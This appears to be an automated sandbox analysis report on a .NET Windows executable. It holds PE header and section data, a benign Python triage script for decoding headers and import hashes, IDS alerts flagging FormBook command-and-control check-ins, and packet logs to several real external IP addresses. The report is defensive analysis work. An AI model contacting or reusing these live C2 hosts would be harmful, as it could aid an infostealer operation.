                                                  TLSH:8305F00136699807D6B64BF14A31F2B41BB87DEEB921D2D64ED56DCFB8E5F001A81323
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V/Mg..............0...... ........... ........@.. ....................................@................................
                                                  Icon Hash:5ba4a66a2a263095
                                                  Entrypoint:0x4cbd92
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x674D2F56 [Mon Dec 2 03:53:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
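The entry point, DLL characteristics, time stamp and import hash above are what a static-triage script derives from the PE headers. As an added example, not code from the report or from Joe Sandbox, the following stdlib-only Python reproduces those decodes on the listed values: the DllCharacteristics bitmask (0x8540 is the value that yields the four flags listed), the COFF time stamp, and the import hash as pefile defines it (lower-cased dll.function pairs, comma-joined, MD5; pefile's name lookup for ordinal imports from a few well-known DLLs is omitted). Two inputs are assumptions rather than bytes read from the sample: the six-byte entry stub is reconstructed from the disassembled `jmp dword ptr [00402000h]` that the listing shows, and the import list is the one a managed PE32 normally carries, a single import of mscoree!_CorExeMain.

```python
import hashlib
from datetime import datetime, timezone
from typing import List, Optional, Tuple, Union

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}


def decode_dll_characteristics(value: int) -> List[str]:
    """Expand OptionalHeader.DllCharacteristics into flag names, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def pe_timestamp(value: int) -> str:
    """Render the COFF TimeDateStamp (seconds since the Unix epoch) in UTC."""
    return datetime.fromtimestamp(value, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def imphash(imports: List[Tuple[str, Union[str, int]]]) -> str:
    """Import hash as pefile computes it: 'dll.func' pairs, lower-cased, comma-joined, MD5.
    Ordinal-only imports become 'ordN'; pefile's well-known-ordinal name lookup is omitted."""
    parts = []
    for dll, func in imports:
        dll = dll.lower()
        base, _, ext = dll.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            dll = base
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{dll}.{name}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def decode_indirect_jmp(stub: bytes) -> Optional[int]:
    """For a 32-bit 'FF 25 imm32' (jmp dword ptr [imm32]) return the absolute slot address it jumps through."""
    if len(stub) >= 6 and stub[0] == 0xFF and stub[1] == 0x25:
        return int.from_bytes(stub[2:6], "little")
    return None


# Values from the static-information table, plus two ASSUMPTIONS: the stub bytes are
# reconstructed from the listed disassembly, and the import list is the single
# mscoree!_CorExeMain import that a managed PE32 normally has.
ENTRY_STUB = bytes.fromhex("FF25 00204000")
DLL_CHARACTERISTICS_VALUE = 0x8540      # DYNAMIC_BASE | NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE
TIME_DATE_STAMP = 0x674D2F56
ASSUMED_IMPORTS = [("mscoree.dll", "_CorExeMain")]
GENERIC_DOTNET_IMPHASH = imphash([("mscoree.dll", "_CorExeMain")])


def triage_static(stub: bytes, dll_chars: int, stamp: int, imports) -> dict:
    iat_slot = decode_indirect_jmp(stub)
    digest = imphash(imports)
    return {
        "entry_is_iat_thunk": iat_slot is not None,
        "iat_slot": iat_slot,
        "dll_characteristics": decode_dll_characteristics(dll_chars),
        "compiled": pe_timestamp(stamp),
        "imphash": digest,
        # every .NET binary that imports only _CorExeMain shares one imphash, so it cannot be used to pivot
        "imphash_is_generic_dotnet": digest == GENERIC_DOTNET_IMPHASH,
    }


if __name__ == "__main__":
    for key, value in triage_static(ENTRY_STUB, DLL_CHARACTERISTICS_VALUE, TIME_DATE_STAMP, ASSUMED_IMPORTS).items():
        print(f"{key}: {value}")
```

The import-hash check is the caveat that matters for this sample: a .NET executable whose only native import is _CorExeMain hashes to the same value as every other such executable, so the Import Hash line identifies the file as managed rather than linking it to related builds; pivot on the SSDEEP and TLSH values and on the dropped-file hashes instead.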
Instruction
jmp dword ptr [00402000h]   ; native entry stub of a managed PE32: it jumps through the IAT slot at 0x402000, which in a .NET executable holds mscoree!_CorExeMain, so the sample's real logic is in the CIL, not in native code here
add byte ptr [eax], al      ; repeated for the remainder of the listing: the bytes after the six-byte stub are 00 00 padding, which the disassembler renders as this instruction
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcbd40 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcc000 | 0x1c3c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xce000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xc9d98 | 0xc9e00 | 5d858db0d347b96f86432812f02d7381 | False | 0.8861672794117647 | data | 7.725344675276943 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xcc000 | 0x1c3c | 0x1e00 | 2fa306b0cb2010af4522963ffb0dbffc | False | 0.80546875 | data | 7.0658536287420395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xce000 | 0xc | 0x200 | 19a4c461ef60068edccf51b06e2252cb | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xcc100 | 0x164f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.951672211521625 |
| RT_GROUP_ICON | 0xcd760 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xcd784 | 0x2b8 | COM executable for DOS | | | 0.44971264367816094 |
| RT_MANIFEST | 0xcda4c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-14T13:50:26.831562+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49715 | 27.124.4.246 | 80 | TCP |
| 2024-12-14T13:50:45.112946+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49743 | 156.232.181.155 | 80 | TCP |
| 2024-12-14T13:50:47.769352+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49749 | 156.232.181.155 | 80 | TCP |
| 2024-12-14T13:50:50.425470+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49755 | 156.232.181.155 | 80 | TCP |
| 2024-12-14T13:50:53.267883+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49761 | 156.232.181.155 | 80 | TCP |
| 2024-12-14T13:51:00.169850+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49777 | 185.27.134.206 | 80 | TCP |
| 2024-12-14T13:51:02.982857+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49785 | 185.27.134.206 | 80 | TCP |
| 2024-12-14T13:51:05.643181+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49794 | 185.27.134.206 | 80 | TCP |
| 2024-12-14T13:51:08.315517+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49800 | 185.27.134.206 | 80 | TCP |
| 2024-12-14T13:51:15.940564+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49815 | 88.99.61.52 | 80 | TCP |
| 2024-12-14T13:51:18.496919+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49821 | 88.99.61.52 | 80 | TCP |
| 2024-12-14T13:51:21.155464+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49829 | 88.99.61.52 | 80 | TCP |
| 2024-12-14T13:51:23.825390+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49836 | 88.99.61.52 | 80 | TCP |
| 2024-12-14T13:51:30.429742+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49854 | 104.21.90.137 | 80 | TCP |
| 2024-12-14T13:51:33.099346+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49860 | 104.21.90.137 | 80 | TCP |
| 2024-12-14T13:51:35.775082+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49866 | 104.21.90.137 | 80 | TCP |
| 2024-12-14T13:51:39.039809+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49877 | 104.21.90.137 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 14, 2024 13:50:25.310548067 CET | 49715 | 80 | 192.168.2.8 | 27.124.4.246 |
| Dec 14, 2024 13:50:25.431241989 CET | 80 | 49715 | 27.124.4.246 | 192.168.2.8 |
| Dec 14, 2024 13:50:25.431349993 CET | 49715 | 80 | 192.168.2.8 | 27.124.4.246 |
| Dec 14, 2024 13:50:25.442675114 CET | 49715 | 80 | 192.168.2.8 | 27.124.4.246 |
| Dec 14, 2024 13:50:25.562776089 CET | 80 | 49715 | 27.124.4.246 | 192.168.2.8 |
| Dec 14, 2024 13:50:26.787653923 CET | 80 | 49715 | 27.124.4.246 | 192.168.2.8 |
| Dec 14, 2024 13:50:26.831562042 CET | 49715 | 80 | 192.168.2.8 | 27.124.4.246 |
| Dec 14, 2024 13:50:26.979624033 CET | 80 | 49715 | 27.124.4.246 | 192.168.2.8 |
| Dec 14, 2024 13:50:26.979727983 CET | 49715 | 80 | 192.168.2.8 | 27.124.4.246 |
| Dec 14, 2024 13:50:26.982897997 CET | 49715 | 80 | 192.168.2.8 | 27.124.4.246 |
| Dec 14, 2024 13:50:27.102679968 CET | 80 | 49715 | 27.124.4.246 | 192.168.2.8 |
| Dec 14, 2024 13:50:43.475744963 CET | 49743 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:43.596249104 CET | 80 | 49743 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:43.596414089 CET | 49743 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:43.610299110 CET | 49743 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:43.730200052 CET | 80 | 49743 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:45.112946033 CET | 49743 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:45.233313084 CET | 80 | 49743 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:45.233391047 CET | 49743 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:46.131850004 CET | 49749 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:46.251591921 CET | 80 | 49749 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:46.251688957 CET | 49749 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:46.267218113 CET | 49749 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:46.386986017 CET | 80 | 49749 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:47.769351959 CET | 49749 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:47.889523029 CET | 80 | 49749 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:47.889626026 CET | 49749 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:48.787825108 CET | 49755 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:48.907645941 CET | 80 | 49755 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:48.907799006 CET | 49755 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:48.922327995 CET | 49755 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:49.042130947 CET | 80 | 49755 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:49.042172909 CET | 80 | 49755 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:50.425470114 CET | 49755 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:50.546577930 CET | 80 | 49755 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:50.546643019 CET | 49755 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:51.444854021 CET | 49761 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:51.565881014 CET | 80 | 49761 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:51.566039085 CET | 49761 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:51.575658083 CET | 49761 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:51.881213903 CET | 80 | 49761 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:53.265980005 CET | 80 | 49761 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:53.266170979 CET | 80 | 49761 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:53.267883062 CET | 49761 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:53.268954039 CET | 49761 | 80 | 192.168.2.8 | 156.232.181.155 |
| Dec 14, 2024 13:50:53.389709949 CET | 80 | 49761 | 156.232.181.155 | 192.168.2.8 |
| Dec 14, 2024 13:50:58.785538912 CET | 49777 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:50:58.907830954 CET | 80 | 49777 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:50:58.908061028 CET | 49777 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:50:58.923146009 CET | 49777 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:50:59.043555021 CET | 80 | 49777 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:00.169723034 CET | 80 | 49777 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:00.169795036 CET | 80 | 49777 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:00.169850111 CET | 49777 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:00.425479889 CET | 49777 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:01.445554972 CET | 49785 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:01.730911970 CET | 80 | 49785 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:01.731003046 CET | 49785 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:01.750704050 CET | 49785 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:01.870500088 CET | 80 | 49785 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:02.982692957 CET | 80 | 49785 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:02.982774973 CET | 80 | 49785 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:02.982856989 CET | 49785 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:03.253664970 CET | 49785 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:04.273412943 CET | 49794 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:04.393270969 CET | 80 | 49794 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:04.393368959 CET | 49794 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:04.411801100 CET | 49794 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:04.533077002 CET | 80 | 49794 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:04.533123016 CET | 80 | 49794 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:05.643049955 CET | 80 | 49794 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:05.643129110 CET | 80 | 49794 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:05.643181086 CET | 49794 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:05.925507069 CET | 49794 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:06.177414894 CET | 80 | 49794 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:06.177505016 CET | 49794 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:06.944417953 CET | 49800 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:07.064320087 CET | 80 | 49800 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:07.064452887 CET | 49800 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:07.082458973 CET | 49800 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:07.202305079 CET | 80 | 49800 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:08.315129995 CET | 80 | 49800 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:08.315198898 CET | 80 | 49800 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:08.315516949 CET | 49800 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:08.318294048 CET | 49800 | 80 | 192.168.2.8 | 185.27.134.206 |
| Dec 14, 2024 13:51:08.442359924 CET | 80 | 49800 | 185.27.134.206 | 192.168.2.8 |
| Dec 14, 2024 13:51:14.444092035 CET | 49815 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:14.565093994 CET | 80 | 49815 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:14.565237045 CET | 49815 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:14.579996109 CET | 49815 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:14.783737898 CET | 80 | 49815 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:15.940464973 CET | 80 | 49815 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:15.940488100 CET | 80 | 49815 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:15.940563917 CET | 49815 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:16.081736088 CET | 49815 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:17.100298882 CET | 49821 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:17.220108032 CET | 80 | 49821 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:17.220352888 CET | 49821 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:17.235116959 CET | 49821 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:17.354919910 CET | 80 | 49821 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:18.496782064 CET | 80 | 49821 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:18.496831894 CET | 80 | 49821 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:18.496918917 CET | 49821 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:18.737946033 CET | 49821 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:19.757158041 CET | 49829 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:19.877676964 CET | 80 | 49829 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:19.877763033 CET | 49829 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:19.898612976 CET | 49829 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:20.019504070 CET | 80 | 49829 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:20.019594908 CET | 80 | 49829 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:21.155148029 CET | 80 | 49829 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:21.155410051 CET | 80 | 49829 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:21.155463934 CET | 49829 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:21.409799099 CET | 49829 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:22.428582907 CET | 49836 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:22.548466921 CET | 80 | 49836 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:22.548561096 CET | 49836 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:22.558510065 CET | 49836 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:22.680435896 CET | 80 | 49836 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:23.825227022 CET | 80 | 49836 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:23.825344086 CET | 80 | 49836 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:23.825390100 CET | 49836 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:23.828664064 CET | 49836 | 80 | 192.168.2.8 | 88.99.61.52 |
| Dec 14, 2024 13:51:23.948853016 CET | 80 | 49836 | 88.99.61.52 | 192.168.2.8 |
| Dec 14, 2024 13:51:29.152894974 CET | 49854 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:29.273885965 CET | 80 | 49854 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:29.274049044 CET | 49854 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:29.295617104 CET | 49854 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:29.417330980 CET | 80 | 49854 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:30.429028034 CET | 80 | 49854 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:30.429501057 CET | 80 | 49854 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:30.429742098 CET | 49854 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:30.800524950 CET | 49854 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:31.819638968 CET | 49860 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:31.940537930 CET | 80 | 49860 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:31.940622091 CET | 49860 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:31.956368923 CET | 49860 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:32.076359034 CET | 80 | 49860 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:33.099092960 CET | 80 | 49860 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:33.099277020 CET | 80 | 49860 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:33.099345922 CET | 49860 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:33.472369909 CET | 49860 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:34.491153955 CET | 49866 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:34.612752914 CET | 80 | 49866 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:34.612874985 CET | 49866 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:34.628195047 CET | 49866 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:34.748119116 CET | 80 | 49866 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:34.748142958 CET | 80 | 49866 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:35.774682999 CET | 80 | 49866 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:35.774991035 CET | 80 | 49866 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:35.775082111 CET | 49866 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:36.753801107 CET | 49866 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:37.774235964 CET | 49877 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:37.894521952 CET | 80 | 49877 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:37.894653082 CET | 49877 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:37.903799057 CET | 49877 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:38.023652077 CET | 80 | 49877 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:39.037941933 CET | 80 | 49877 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:39.038455963 CET | 80 | 49877 | 104.21.90.137 | 192.168.2.8 |
| Dec 14, 2024 13:51:39.039808989 CET | 49877 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:39.041357994 CET | 49877 | 80 | 192.168.2.8 | 104.21.90.137 |
| Dec 14, 2024 13:51:39.161206007 CET | 80 | 49877 | 104.21.90.137 | 192.168.2.8 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 14, 2024 13:50:24.593214035 CET | 59768 | 53 | 192.168.2.8 | 1.1.1.1 |
